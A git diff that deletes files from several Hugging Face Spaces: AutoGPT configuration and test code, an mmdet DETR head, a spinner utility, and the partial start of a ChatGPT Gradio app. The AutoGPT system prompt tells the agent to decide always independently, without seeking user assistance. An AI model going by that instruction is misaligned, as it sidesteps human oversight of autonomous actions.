+0,0 @@ -# sourcery skip: do-not-use-staticmethod -""" -A module that contains the AIConfig class object that contains the configuration -""" -from __future__ import annotations - -import os -from typing import Type - -import yaml - - -class AIConfig: - """ - A class object that contains the configuration information for the AI - - Attributes: - ai_name (str): The name of the AI. - ai_role (str): The description of the AI's role. - ai_goals (list): The list of objectives the AI is supposed to complete. - """ - - def __init__( - self, ai_name: str = "", ai_role: str = "", ai_goals: list | None = None - ) -> None: - """ - Initialize a class instance - - Parameters: - ai_name (str): The name of the AI. - ai_role (str): The description of the AI's role. - ai_goals (list): The list of objectives the AI is supposed to complete. - Returns: - None - """ - if ai_goals is None: - ai_goals = [] - self.ai_name = ai_name - self.ai_role = ai_role - self.ai_goals = ai_goals - - # Soon this will go in a folder where it remembers more stuff about the run(s) - SAVE_FILE = os.path.join(os.path.dirname(__file__), "..", "ai_settings.yaml") - - @staticmethod - def load(config_file: str = SAVE_FILE) -> "AIConfig": - """ - Returns class object with parameters (ai_name, ai_role, ai_goals) loaded from - yaml file if yaml file exists, - else returns class with no parameters. - - Parameters: - config_file (int): The path to the config yaml file. - DEFAULT: "../ai_settings.yaml" - - Returns: - cls (object): An instance of given cls object - """ - - try: - with open(config_file, encoding="utf-8") as file: - config_params = yaml.load(file, Loader=yaml.FullLoader) - except FileNotFoundError: - config_params = {} - - ai_name = config_params.get("ai_name", "") - ai_role = config_params.get("ai_role", "") - ai_goals = config_params.get("ai_goals", []) - # type: Type[AIConfig] - return AIConfig(ai_name, ai_role, ai_goals) - - def save(self, config_file: str = SAVE_FILE) -> None: - """ - Saves the class parameters to the specified file yaml file path as a yaml file. - - Parameters: - config_file(str): The path to the config yaml file. - DEFAULT: "../ai_settings.yaml" - - Returns: - None - """ - - config = { - "ai_name": self.ai_name, - "ai_role": self.ai_role, - "ai_goals": self.ai_goals, - } - with open(config_file, "w", encoding="utf-8") as file: - yaml.dump(config, file, allow_unicode=True) - - def construct_full_prompt(self) -> str: - """ - Returns a prompt to the user with the class information in an organized fashion. - - Parameters: - None - - Returns: - full_prompt (str): A string containing the initial prompt for the user - including the ai_name, ai_role and ai_goals. - """ - - prompt_start = ( - "Your decisions must always be made independently without" - " seeking user assistance. Play to your strengths as an LLM and pursue" - " simple strategies with no legal complications." - "" - ) - - from autogpt.prompt import get_prompt - - # Construct full prompt - full_prompt = ( - f"You are {self.ai_name}, {self.ai_role}\n{prompt_start}\n\nGOALS:\n\n" - ) - for i, goal in enumerate(self.ai_goals): - full_prompt += f"{i+1}. {goal}\n" - - full_prompt += f"\n\n{get_prompt()}" - return full_prompt diff --git a/spaces/Kevin676/AutoGPT/tests/test_prompt_generator.py b/spaces/Kevin676/AutoGPT/tests/test_prompt_generator.py deleted file mode 100644 index 6a0bfd6c7bbdbfaa3750e9dee621bd25e17a448b..0000000000000000000000000000000000000000 --- a/spaces/Kevin676/AutoGPT/tests/test_prompt_generator.py +++ /dev/null @@ -1,114 +0,0 @@ -from unittest import TestCase - -from autogpt.promptgenerator import PromptGenerator - - -class TestPromptGenerator(TestCase): - """ - Test cases for the PromptGenerator class, which is responsible for generating - prompts for the AI with constraints, commands, resources, and performance evaluations. - """ - - @classmethod - def setUpClass(cls): - """ - Set up the initial state for each test method by creating an instance of PromptGenerator. - """ - cls.generator = PromptGenerator() - - # Test whether the add_constraint() method adds a constraint to the generator's constraints list - def test_add_constraint(self): - """ - Test if the add_constraint() method adds a constraint to the generator's constraints list. - """ - constraint = "Constraint1" - self.generator.add_constraint(constraint) - self.assertIn(constraint, self.generator.constraints) - - # Test whether the add_command() method adds a command to the generator's commands list - def test_add_command(self): - """ - Test if the add_command() method adds a command to the generator's commands list. - """ - command_label = "Command Label" - command_name = "command_name" - args = {"arg1": "value1", "arg2": "value2"} - self.generator.add_command(command_label, command_name, args) - command = { - "label": command_label, - "name": command_name, - "args": args, - } - self.assertIn(command, self.generator.commands) - - def test_add_resource(self): - """ - Test if the add_resource() method adds a resource to the generator's resources list. - """ - resource = "Resource1" - self.generator.add_resource(resource) - self.assertIn(resource, self.generator.resources) - - def test_add_performance_evaluation(self): - """ - Test if the add_performance_evaluation() method adds an evaluation to the generator's - performance_evaluation list. - """ - evaluation = "Evaluation1" - self.generator.add_performance_evaluation(evaluation) - self.assertIn(evaluation, self.generator.performance_evaluation) - - def test_generate_prompt_string(self): - """ - Test if the generate_prompt_string() method generates a prompt string with all the added - constraints, commands, resources, and evaluations. - """ - # Define the test data - constraints = ["Constraint1", "Constraint2"] - commands = [ - { - "label": "Command1", - "name": "command_name1", - "args": {"arg1": "value1"}, - }, - { - "label": "Command2", - "name": "command_name2", - "args": {}, - }, - ] - resources = ["Resource1", "Resource2"] - evaluations = ["Evaluation1", "Evaluation2"] - - # Add test data to the generator - for constraint in constraints: - self.generator.add_constraint(constraint) - for command in commands: - self.generator.add_command( - command["label"], command["name"], command["args"] - ) - for resource in resources: - self.generator.add_resource(resource) - for evaluation in evaluations: - self.generator.add_performance_evaluation(evaluation) - - # Generate the prompt string and verify its correctness - prompt_string = self.generator.generate_prompt_string() - self.assertIsNotNone(prompt_string) - - # Check if all constraints, commands, resources, and evaluations are present in the prompt string - for constraint in constraints: - self.assertIn(constraint, prompt_string) - for command in commands: - self.assertIn(command["name"], prompt_string) - for key, value in command["args"].items(): - self.assertIn(f'"{key}": "{value}"', prompt_string) - for resource in resources: - self.assertIn(resource, prompt_string) - for evaluation in evaluations: - self.assertIn(evaluation, prompt_string) - - self.assertIn("constraints", prompt_string.lower()) - self.assertIn("commands", prompt_string.lower()) - self.assertIn("resources", prompt_string.lower()) - self.assertIn("performance evaluation", prompt_string.lower()) diff --git a/spaces/KyanChen/RSPrompter/mmdet/models/dense_heads/detr_head.py b/spaces/KyanChen/RSPrompter/mmdet/models/dense_heads/detr_head.py deleted file mode 100644 index 42a94d1ae9c2a05fbc9d6c59f9ef181f73a5929b..0000000000000000000000000000000000000000 --- a/spaces/KyanChen/RSPrompter/mmdet/models/dense_heads/detr_head.py +++ /dev/null @@ -1,614 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -from typing import Dict, List, Tuple - -import torch -import torch.nn as nn -import torch.nn.functional as F -from mmcv.cnn import Linear -from mmcv.cnn.bricks.transformer import FFN -from mmengine.model import BaseModule -from mmengine.structures import InstanceData -from torch import Tensor - -from mmdet.registry import MODELS, TASK_UTILS -from mmdet.structures import SampleList -from mmdet.structures.bbox import bbox_cxcywh_to_xyxy, bbox_xyxy_to_cxcywh -from mmdet.utils import (ConfigType, InstanceList, OptInstanceList, - OptMultiConfig, reduce_mean) -from ..utils import multi_apply - - -@MODELS.register_module() -class DETRHead(BaseModule): - r"""Head of DETR. DETR:End-to-End Object Detection with Transformers. - - More details can be found in the `paper - `_ . - - Args: - num_classes (int): Number of categories excluding the background. - embed_dims (int): The dims of Transformer embedding. - num_reg_fcs (int): Number of fully-connected layers used in `FFN`, - which is then used for the regression head. Defaults to 2. - sync_cls_avg_factor (bool): Whether to sync the `avg_factor` of - all ranks. Default to `False`. - loss_cls (:obj:`ConfigDict` or dict): Config of the classification - loss. Defaults to `CrossEntropyLoss`. - loss_bbox (:obj:`ConfigDict` or dict): Config of the regression bbox - loss. Defaults to `L1Loss`. - loss_iou (:obj:`ConfigDict` or dict): Config of the regression iou - loss. Defaults to `GIoULoss`. - train_cfg (:obj:`ConfigDict` or dict): Training config of transformer - head. - test_cfg (:obj:`ConfigDict` or dict): Testing config of transformer - head. - init_cfg (:obj:`ConfigDict` or dict, optional): the config to control - the initialization. Defaults to None. - """ - - _version = 2 - - def __init__( - self, - num_classes: int, - embed_dims: int = 256, - num_reg_fcs: int = 2, - sync_cls_avg_factor: bool = False, - loss_cls: ConfigType = dict( - type='CrossEntropyLoss', - bg_cls_weight=0.1, - use_sigmoid=False, - loss_weight=1.0, - class_weight=1.0), - loss_bbox: ConfigType = dict(type='L1Loss', loss_weight=5.0), - loss_iou: ConfigType = dict(type='GIoULoss', loss_weight=2.0), - train_cfg: ConfigType = dict( - assigner=dict( - type='HungarianAssigner', - match_costs=[ - dict(type='ClassificationCost', weight=1.), - dict(type='BBoxL1Cost', weight=5.0, box_format='xywh'), - dict(type='IoUCost', iou_mode='giou', weight=2.0) - ])), - test_cfg: ConfigType = dict(max_per_img=100), - init_cfg: OptMultiConfig = None) -> None: - super().__init__(init_cfg=init_cfg) - self.bg_cls_weight = 0 - self.sync_cls_avg_factor = sync_cls_avg_factor - class_weight = loss_cls.get('class_weight', None) - if class_weight is not None and (self.__class__ is DETRHead): - assert isinstance(class_weight, float), 'Expected ' \ - 'class_weight to have type float. Found ' \ - f'{type(class_weight)}.' - # NOTE following the official DETR repo, bg_cls_weight means - # relative classification weight of the no-object class. - bg_cls_weight = loss_cls.get('bg_cls_weight', class_weight) - assert isinstance(bg_cls_weight, float), 'Expected ' \ - 'bg_cls_weight to have type float. Found ' \ - f'{type(bg_cls_weight)}.' - class_weight = torch.ones(num_classes + 1) * class_weight - # set background class as the last indice - class_weight[num_classes] = bg_cls_weight - loss_cls.update({'class_weight': class_weight}) - if 'bg_cls_weight' in loss_cls: - loss_cls.pop('bg_cls_weight') - self.bg_cls_weight = bg_cls_weight - - if train_cfg: - assert 'assigner' in train_cfg, 'assigner should be provided ' \ - 'when train_cfg is set.' - assigner = train_cfg['assigner'] - self.assigner = TASK_UTILS.build(assigner) - if train_cfg.get('sampler', None) is not None: - raise RuntimeError('DETR do not build sampler.') - self.num_classes = num_classes - self.embed_dims = embed_dims - self.num_reg_fcs = num_reg_fcs - self.train_cfg = train_cfg - self.test_cfg = test_cfg - self.loss_cls = MODELS.build(loss_cls) - self.loss_bbox = MODELS.build(loss_bbox) - self.loss_iou = MODELS.build(loss_iou) - - if self.loss_cls.use_sigmoid: - self.cls_out_channels = num_classes - else: - self.cls_out_channels = num_classes + 1 - - self._init_layers() - - def _init_layers(self) -> None: - """Initialize layers of the transformer head.""" - # cls branch - self.fc_cls = Linear(self.embed_dims, self.cls_out_channels) - # reg branch - self.activate = nn.ReLU() - self.reg_ffn = FFN( - self.embed_dims, - self.embed_dims, - self.num_reg_fcs, - dict(type='ReLU', inplace=True), - dropout=0.0, - add_residual=False) - # NOTE the activations of reg_branch here is the same as - # those in transformer, but they are actually different - # in DAB-DETR (prelu in transformer and relu in reg_branch) - self.fc_reg = Linear(self.embed_dims, 4) - - def forward(self, hidden_states: Tensor) -> Tuple[Tensor]: - """"Forward function. - - Args: - hidden_states (Tensor): Features from transformer decoder. If - `return_intermediate_dec` in detr.py is True output has shape - (num_decoder_layers, bs, num_queries, dim), else has shape - (1, bs, num_queries, dim) which only contains the last layer - outputs. - Returns: - tuple[Tensor]: results of head containing the following tensor. - - - layers_cls_scores (Tensor): Outputs from the classification head, - shape (num_decoder_layers, bs, num_queries, cls_out_channels). - Note cls_out_channels should include background. - - layers_bbox_preds (Tensor): Sigmoid outputs from the regression - head with normalized coordinate format (cx, cy, w, h), has shape - (num_decoder_layers, bs, num_queries, 4). - """ - layers_cls_scores = self.fc_cls(hidden_states) - layers_bbox_preds = self.fc_reg( - self.activate(self.reg_ffn(hidden_states))).sigmoid() - return layers_cls_scores, layers_bbox_preds - - def loss(self, hidden_states: Tensor, - batch_data_samples: SampleList) -> dict: - """Perform forward propagation and loss calculation of the detection - head on the features of the upstream network. - - Args: - hidden_states (Tensor): Feature from the transformer decoder, has - shape (num_decoder_layers, bs, num_queries, cls_out_channels) - or (num_decoder_layers, num_queries, bs, cls_out_channels). - batch_data_samples (List[:obj:`DetDataSample`]): The Data - Samples. It usually includes information such as - `gt_instance`, `gt_panoptic_seg` and `gt_sem_seg`. - - Returns: - dict: A dictionary of loss components. - """ - batch_gt_instances = [] - batch_img_metas = [] - for data_sample in batch_data_samples: - batch_img_metas.append(data_sample.metainfo) - batch_gt_instances.append(data_sample.gt_instances) - - outs = self(hidden_states) - loss_inputs = outs + (batch_gt_instances, batch_img_metas) - losses = self.loss_by_feat(*loss_inputs) - return losses - - def loss_by_feat( - self, - all_layers_cls_scores: Tensor, - all_layers_bbox_preds: Tensor, - batch_gt_instances: InstanceList, - batch_img_metas: List[dict], - batch_gt_instances_ignore: OptInstanceList = None - ) -> Dict[str, Tensor]: - """"Loss function. - - Only outputs from the last feature level are used for computing - losses by default. - - Args: - all_layers_cls_scores (Tensor): Classification outputs - of each decoder layers. Each is a 4D-tensor, has shape - (num_decoder_layers, bs, num_queries, cls_out_channels). - all_layers_bbox_preds (Tensor): Sigmoid regression - outputs of each decoder layers. Each is a 4D-tensor with - normalized coordinate format (cx, cy, w, h) and shape - (num_decoder_layers, bs, num_queries, 4). - batch_gt_instances (list[:obj:`InstanceData`]): Batch of - gt_instance. It usually includes ``bboxes`` and ``labels`` - attributes. - batch_img_metas (list[dict]): Meta information of each image, e.g., - image size, scaling factor, etc. - batch_gt_instances_ignore (list[:obj:`InstanceData`], optional): - Batch of gt_instances_ignore. It includes ``bboxes`` attribute - data that is ignored during training and testing. - Defaults to None. - - Returns: - dict[str, Tensor]: A dictionary of loss components. - """ - assert batch_gt_instances_ignore is None, \ - f'{self.__class__.__name__} only supports ' \ - 'for batch_gt_instances_ignore setting to None.' - - losses_cls, losses_bbox, losses_iou = multi_apply( - self.loss_by_feat_single, - all_layers_cls_scores, - all_layers_bbox_preds, - batch_gt_instances=batch_gt_instances, - batch_img_metas=batch_img_metas) - - loss_dict = dict() - # loss from the last decoder layer - loss_dict['loss_cls'] = losses_cls[-1] - loss_dict['loss_bbox'] = losses_bbox[-1] - loss_dict['loss_iou'] = losses_iou[-1] - # loss from other decoder layers - num_dec_layer = 0 - for loss_cls_i, loss_bbox_i, loss_iou_i in \ - zip(losses_cls[:-1], losses_bbox[:-1], losses_iou[:-1]): - loss_dict[f'd{num_dec_layer}.loss_cls'] = loss_cls_i - loss_dict[f'd{num_dec_layer}.loss_bbox'] = loss_bbox_i - loss_dict[f'd{num_dec_layer}.loss_iou'] = loss_iou_i - num_dec_layer += 1 - return loss_dict - - def loss_by_feat_single(self, cls_scores: Tensor, bbox_preds: Tensor, - batch_gt_instances: InstanceList, - batch_img_metas: List[dict]) -> Tuple[Tensor]: - """Loss function for outputs from a single decoder layer of a single - feature level. - - Args: - cls_scores (Tensor): Box score logits from a single decoder layer - for all images, has shape (bs, num_queries, cls_out_channels). - bbox_preds (Tensor): Sigmoid outputs from a single decoder layer - for all images, with normalized coordinate (cx, cy, w, h) and - shape (bs, num_queries, 4). - batch_gt_instances (list[:obj:`InstanceData`]): Batch of - gt_instance. It usually includes ``bboxes`` and ``labels`` - attributes. - batch_img_metas (list[dict]): Meta information of each image, e.g., - image size, scaling factor, etc. - - Returns: - Tuple[Tensor]: A tuple including `loss_cls`, `loss_box` and - `loss_iou`. - """ - num_imgs = cls_scores.size(0) - cls_scores_list = [cls_scores[i] for i in range(num_imgs)] - bbox_preds_list = [bbox_preds[i] for i in range(num_imgs)] - cls_reg_targets = self.get_targets(cls_scores_list, bbox_preds_list, - batch_gt_instances, batch_img_metas) - (labels_list, label_weights_list, bbox_targets_list, bbox_weights_list, - num_total_pos, num_total_neg) = cls_reg_targets - labels = torch.cat(labels_list, 0) - label_weights = torch.cat(label_weights_list, 0) - bbox_targets = torch.cat(bbox_targets_list, 0) - bbox_weights = torch.cat(bbox_weights_list, 0) - - # classification loss - cls_scores = cls_scores.reshape(-1, self.cls_out_channels) - # construct weighted avg_factor to match with the official DETR repo - cls_avg_factor = num_total_pos * 1.0 + \ - num_total_neg * self.bg_cls_weight - if self.sync_cls_avg_factor: - cls_avg_factor = reduce_mean( - cls_scores.new_tensor([cls_avg_factor])) - cls_avg_factor = max(cls_avg_factor, 1) - - loss_cls = self.loss_cls( - cls_scores, labels, label_weights, avg_factor=cls_avg_factor) - - # Compute the average number of gt boxes across all gpus, for - # normalization purposes - num_total_pos = loss_cls.new_tensor([num_total_pos]) - num_total_pos = torch.clamp(reduce_mean(num_total_pos), min=1).item() - - # construct factors used for rescale bboxes - factors = [] - for img_meta, bbox_pred in zip(batch_img_metas, bbox_preds): - img_h, img_w, = img_meta['img_shape'] - factor = bbox_pred.new_tensor([img_w, img_h, img_w, - img_h]).unsqueeze(0).repeat( - bbox_pred.size(0), 1) - factors.append(factor) - factors = torch.cat(factors, 0) - - # DETR regress the relative position of boxes (cxcywh) in the image, - # thus the learning target is normalized by the image size. So here - # we need to re-scale them for calculating IoU loss - bbox_preds = bbox_preds.reshape(-1, 4) - bboxes = bbox_cxcywh_to_xyxy(bbox_preds) * factors - bboxes_gt = bbox_cxcywh_to_xyxy(bbox_targets) * factors - - # regression IoU loss, defaultly GIoU loss - loss_iou = self.loss_iou( - bboxes, bboxes_gt, bbox_weights, avg_factor=num_total_pos) - - # regression L1 loss - loss_bbox = self.loss_bbox( - bbox_preds, bbox_targets, bbox_weights, avg_factor=num_total_pos) - return loss_cls, loss_bbox, loss_iou - - def get_targets(self, cls_scores_list: List[Tensor], - bbox_preds_list: List[Tensor], - batch_gt_instances: InstanceList, - batch_img_metas: List[dict]) -> tuple: - """Compute regression and classification targets for a batch image. - - Outputs from a single decoder layer of a single feature level are used. - - Args: - cls_scores_list (list[Tensor]): Box score logits from a single - decoder layer for each image, has shape [num_queries, - cls_out_channels]. - bbox_preds_list (list[Tensor]): Sigmoid outputs from a single - decoder layer for each image, with normalized coordinate - (cx, cy, w, h) and shape [num_queries, 4]. - batch_gt_instances (list[:obj:`InstanceData`]): Batch of - gt_instance. It usually includes ``bboxes`` and ``labels`` - attributes. - batch_img_metas (list[dict]): Meta information of each image, e.g., - image size, scaling factor, etc. - - Returns: - tuple: a tuple containing the following targets. - - - labels_list (list[Tensor]): Labels for all images. - - label_weights_list (list[Tensor]): Label weights for all images. - - bbox_targets_list (list[Tensor]): BBox targets for all images. - - bbox_weights_list (list[Tensor]): BBox weights for all images. - - num_total_pos (int): Number of positive samples in all images. - - num_total_neg (int): Number of negative samples in all images. - """ - (labels_list, label_weights_list, bbox_targets_list, bbox_weights_list, - pos_inds_list, - neg_inds_list) = multi_apply(self._get_targets_single, - cls_scores_list, bbox_preds_list, - batch_gt_instances, batch_img_metas) - num_total_pos = sum((inds.numel() for inds in pos_inds_list)) - num_total_neg = sum((inds.numel() for inds in neg_inds_list)) - return (labels_list, label_weights_list, bbox_targets_list, - bbox_weights_list, num_total_pos, num_total_neg) - - def _get_targets_single(self, cls_score: Tensor, bbox_pred: Tensor, - gt_instances: InstanceData, - img_meta: dict) -> tuple: - """Compute regression and classification targets for one image. - - Outputs from a single decoder layer of a single feature level are used. - - Args: - cls_score (Tensor): Box score logits from a single decoder layer - for one image. Shape [num_queries, cls_out_channels]. - bbox_pred (Tensor): Sigmoid outputs from a single decoder layer - for one image, with normalized coordinate (cx, cy, w, h) and - shape [num_queries, 4]. - gt_instances (:obj:`InstanceData`): Ground truth of instance - annotations. It should includes ``bboxes`` and ``labels`` - attributes. - img_meta (dict): Meta information for one image. - - Returns: - tuple[Tensor]: a tuple containing the following for one image. - - - labels (Tensor): Labels of each image. - - label_weights (Tensor]): Label weights of each image. - - bbox_targets (Tensor): BBox targets of each image. - - bbox_weights (Tensor): BBox weights of each image. - - pos_inds (Tensor): Sampled positive indices for each image. - - neg_inds (Tensor): Sampled negative indices for each image. - """ - img_h, img_w = img_meta['img_shape'] - factor = bbox_pred.new_tensor([img_w, img_h, img_w, - img_h]).unsqueeze(0) - num_bboxes = bbox_pred.size(0) - # convert bbox_pred from xywh, normalized to xyxy, unnormalized - bbox_pred = bbox_cxcywh_to_xyxy(bbox_pred) - bbox_pred = bbox_pred * factor - - pred_instances = InstanceData(scores=cls_score, bboxes=bbox_pred) - # assigner and sampler - assign_result = self.assigner.assign( - pred_instances=pred_instances, - gt_instances=gt_instances, - img_meta=img_meta) - - gt_bboxes = gt_instances.bboxes - gt_labels = gt_instances.labels - pos_inds = torch.nonzero( - assign_result.gt_inds > 0, as_tuple=False).squeeze(-1).unique() - neg_inds = torch.nonzero( - assign_result.gt_inds == 0, as_tuple=False).squeeze(-1).unique() - pos_assigned_gt_inds = assign_result.gt_inds[pos_inds] - 1 - pos_gt_bboxes = gt_bboxes[pos_assigned_gt_inds.long(), :] - - # label targets - labels = gt_bboxes.new_full((num_bboxes, ), - self.num_classes, - dtype=torch.long) - labels[pos_inds] = gt_labels[pos_assigned_gt_inds] - label_weights = gt_bboxes.new_ones(num_bboxes) - - # bbox targets - bbox_targets = torch.zeros_like(bbox_pred) - bbox_weights = torch.zeros_like(bbox_pred) - bbox_weights[pos_inds] = 1.0 - - # DETR regress the relative position of boxes (cxcywh) in the image. - # Thus the learning target should be normalized by the image size, also - # the box format should be converted from defaultly x1y1x2y2 to cxcywh. - pos_gt_bboxes_normalized = pos_gt_bboxes / factor - pos_gt_bboxes_targets = bbox_xyxy_to_cxcywh(pos_gt_bboxes_normalized) - bbox_targets[pos_inds] = pos_gt_bboxes_targets - return (labels, label_weights, bbox_targets, bbox_weights, pos_inds, - neg_inds) - - def loss_and_predict( - self, hidden_states: Tuple[Tensor], - batch_data_samples: SampleList) -> Tuple[dict, InstanceList]: - """Perform forward propagation of the head, then calculate loss and - predictions from the features and data samples. Over-write because - img_metas are needed as inputs for bbox_head. - - Args: - hidden_states (tuple[Tensor]): Feature from the transformer - decoder, has shape (num_decoder_layers, bs, num_queries, dim). - batch_data_samples (list[:obj:`DetDataSample`]): Each item contains - the meta information of each image and corresponding - annotations. - - Returns: - tuple: the return value is a tuple contains: - - - losses: (dict[str, Tensor]): A dictionary of loss components. - - predictions (list[:obj:`InstanceData`]): Detection - results of each image after the post process. - """ - batch_gt_instances = [] - batch_img_metas = [] - for data_sample in batch_data_samples: - batch_img_metas.append(data_sample.metainfo) - batch_gt_instances.append(data_sample.gt_instances) - - outs = self(hidden_states) - loss_inputs = outs + (batch_gt_instances, batch_img_metas) - losses = self.loss_by_feat(*loss_inputs) - - predictions = self.predict_by_feat( - *outs, batch_img_metas=batch_img_metas) - return losses, predictions - - def predict(self, - hidden_states: Tuple[Tensor], - batch_data_samples: SampleList, - rescale: bool = True) -> InstanceList: - """Perform forward propagation of the detection head and predict - detection results on the features of the upstream network. Over-write - because img_metas are needed as inputs for bbox_head. - - Args: - hidden_states (tuple[Tensor]): Multi-level features from the - upstream network, each is a 4D-tensor. - batch_data_samples (List[:obj:`DetDataSample`]): The Data - Samples. It usually includes information such as - `gt_instance`, `gt_panoptic_seg` and `gt_sem_seg`. - rescale (bool, optional): Whether to rescale the results. - Defaults to True. - - Returns: - list[obj:`InstanceData`]: Detection results of each image - after the post process. - """ - batch_img_metas = [ - data_samples.metainfo for data_samples in batch_data_samples - ] - - last_layer_hidden_state = hidden_states[-1].unsqueeze(0) - outs = self(last_layer_hidden_state) - - predictions = self.predict_by_feat( - *outs, batch_img_metas=batch_img_metas, rescale=rescale) - - return predictions - - def predict_by_feat(self, - layer_cls_scores: Tensor, - layer_bbox_preds: Tensor, - batch_img_metas: List[dict], - rescale: bool = True) -> InstanceList: - """Transform network outputs for a batch into bbox predictions. - - Args: - layer_cls_scores (Tensor): Classification outputs of the last or - all decoder layer. Each is a 4D-tensor, has shape - (num_decoder_layers, bs, num_queries, cls_out_channels). - layer_bbox_preds (Tensor): Sigmoid regression outputs of the last - or all decoder layer. Each is a 4D-tensor with normalized - coordinate format (cx, cy, w, h) and shape - (num_decoder_layers, bs, num_queries, 4). - batch_img_metas (list[dict]): Meta information of each image. - rescale (bool, optional): If `True`, return boxes in original - image space. Defaults to `True`. - - Returns: - list[:obj:`InstanceData`]: Object detection results of each image - after the post process. Each item usually contains following keys. - - - scores (Tensor): Classification scores, has a shape - (num_instance, ) - - labels (Tensor): Labels of bboxes, has a shape - (num_instances, ). - - bboxes (Tensor): Has a shape (num_instances, 4), - the last dimension 4 arrange as (x1, y1, x2, y2). - """ - # NOTE only using outputs from the last feature level, - # and only the outputs from the last decoder layer is used. - cls_scores = layer_cls_scores[-1] - bbox_preds = layer_bbox_preds[-1] - - result_list = [] - for img_id in range(len(batch_img_metas)): - cls_score = cls_scores[img_id] - bbox_pred = bbox_preds[img_id] - img_meta = batch_img_metas[img_id] - results = self._predict_by_feat_single(cls_score, bbox_pred, - img_meta, rescale) - result_list.append(results) - return result_list - - def _predict_by_feat_single(self, - cls_score: Tensor, - bbox_pred: Tensor, - img_meta: dict, - rescale: bool = True) -> InstanceData: - """Transform outputs from the last decoder layer into bbox predictions - for each image. - - Args: - cls_score (Tensor): Box score logits from the last decoder layer - for each image. Shape [num_queries, cls_out_channels]. - bbox_pred (Tensor): Sigmoid outputs from the last decoder layer - for each image, with coordinate format (cx, cy, w, h) and - shape [num_queries, 4]. - img_meta (dict): Image meta info. - rescale (bool): If True, return boxes in original image - space. Default True. - - Returns: - :obj:`InstanceData`: Detection results of each image - after the post process. - Each item usually contains following keys. - - - scores (Tensor): Classification scores, has a shape - (num_instance, ) - - labels (Tensor): Labels of bboxes, has a shape - (num_instances, ). - - bboxes (Tensor): Has a shape (num_instances, 4), - the last dimension 4 arrange as (x1, y1, x2, y2). - """ - assert len(cls_score) == len(bbox_pred) # num_queries - max_per_img = self.test_cfg.get('max_per_img', len(cls_score)) - img_shape = img_meta['img_shape'] - # exclude background - if self.loss_cls.use_sigmoid: - cls_score = cls_score.sigmoid() - scores, indexes = cls_score.view(-1).topk(max_per_img) - det_labels = indexes % self.num_classes - bbox_index = indexes // self.num_classes - bbox_pred = bbox_pred[bbox_index] - else: - scores, det_labels = F.softmax(cls_score, dim=-1)[..., :-1].max(-1) - scores, bbox_index = scores.topk(max_per_img) - bbox_pred = bbox_pred[bbox_index] - det_labels = det_labels[bbox_index] - - det_bboxes = bbox_cxcywh_to_xyxy(bbox_pred) - det_bboxes[:, 0::2] = det_bboxes[:, 0::2] * img_shape[1] - det_bboxes[:, 1::2] = det_bboxes[:, 1::2] * img_shape[0] - det_bboxes[:, 0::2].clamp_(min=0, max=img_shape[1]) - det_bboxes[:, 1::2].clamp_(min=0, max=img_shape[0]) - if rescale: - assert img_meta.get('scale_factor') is not None - det_bboxes /= det_bboxes.new_tensor( - img_meta['scale_factor']).repeat((1, 2)) - - results = InstanceData() - results.bboxes = det_bboxes - results.scores = scores - results.labels = det_labels - return results diff --git a/spaces/LLLLLLLyc/anime-remove-background/README.md b/spaces/LLLLLLLyc/anime-remove-background/README.md deleted file mode 100644 index 1ba3cb5ea0e994e246d57b7d62b8aa5a6331901c..0000000000000000000000000000000000000000 --- a/spaces/LLLLLLLyc/anime-remove-background/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Anime Remove Background -emoji: 🪄🖼️ -colorFrom: indigo -colorTo: pink -sdk: gradio -sdk_version: 3.1.4 -app_file: app.py -pinned: false -license: apache-2.0 -duplicated_from: skytnt/anime-remove-background ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Lamai/LAMAIGPT/autogpt/spinner.py b/spaces/Lamai/LAMAIGPT/autogpt/spinner.py deleted file mode 100644 index 4e33d74213881352546f334ccb1eb4772b8b7b70..0000000000000000000000000000000000000000 --- a/spaces/Lamai/LAMAIGPT/autogpt/spinner.py +++ /dev/null @@ -1,65 +0,0 @@ -"""A simple spinner module""" -import itertools -import sys -import threading -import time - - -class Spinner: - """A simple spinner class""" - - def __init__(self, message: str = "Loading...", delay: float = 0.1) -> None: - """Initialize the spinner class - - Args: - message (str): The message to display. - delay (float): The delay between each spinner update. - """ - self.spinner = itertools.cycle(["-", "/", "|", "\\"]) - self.delay = delay - self.message = message - self.running = False - self.spinner_thread = None - - def spin(self) -> None: - """Spin the spinner""" - while self.running: - sys.stdout.write(f"{next(self.spinner)} {self.message}\r") - sys.stdout.flush() - time.sleep(self.delay) - sys.stdout.write(f"\r{' ' * (len(self.message) + 2)}\r") - - def __enter__(self): - """Start the spinner""" - self.running = True - self.spinner_thread = threading.Thread(target=self.spin) - self.spinner_thread.start() - - return self - - def __exit__(self, exc_type, exc_value, exc_traceback) -> None: - """Stop the spinner - - Args: - exc_type (Exception): The exception type. - exc_value (Exception): The exception value. - exc_traceback (Exception): The exception traceback. - """ - self.running = False - if self.spinner_thread is not None: - self.spinner_thread.join() - sys.stdout.write(f"\r{' ' * (len(self.message) + 2)}\r") - sys.stdout.flush() - - def update_message(self, new_message, delay=0.1): - """Update the spinner message - Args: - new_message (str): New message to display - delay: Delay in seconds before updating the message - """ - time.sleep(delay) - sys.stdout.write( - f"\r{' ' * (len(self.message) + 2)}\r" - ) # Clear the current message - sys.stdout.flush() - self.message = new_message diff --git a/spaces/LanQian/ChatGPT/app.py b/spaces/LanQian/ChatGPT/app.py deleted file mode 100644 index c70499db185681e98b1700d30d54ee57633494de..0000000000000000000000000000000000000000 --- a/spaces/LanQian/ChatGPT/app.py +++ /dev/null @@ -1,341 +0,0 @@ -import json -import gradio as gr -# import openai -import os -import sys -import traceback -import requests -# import markdown -import csv - -my_api_key = os.environ["APIKEY"] # 在这里输入你的 API 密钥 -HIDE_MY_KEY = False # 如果你想在UI中隐藏你的 API 密钥,将此值设置为 True - -initial_prompt = "You are a helpful assistant." -API_URL = "https://api.openai.com/v1/chat/completions" -HISTORY_DIR = "history" -TEMPLATES_DIR = "templates" - - - -#if we are running in Docker -if os.environ.get('dockerrun') == 'yes': - dockerflag = True -else: - dockerflag = False - -if dockerflag: - my_api_key = os.environ.get('my_api_key') - if my_api_key == "empty": - print("Please give a api key!") - sys.exit(1) - #auth - username = os.environ.get('USERNAME') - password = os.environ.get('PASSWORD') - if isinstance(username, type(None)) or isinstance(password, type(None)): - authflag = False - else: - authflag = True - - -def parse_text(text): - lines = text.split("\n") - lines = [line for line in lines if line != ""] - count = 0 - firstline = False - for i, line in enumerate(lines): - if "```" in line: - count += 1 - items = 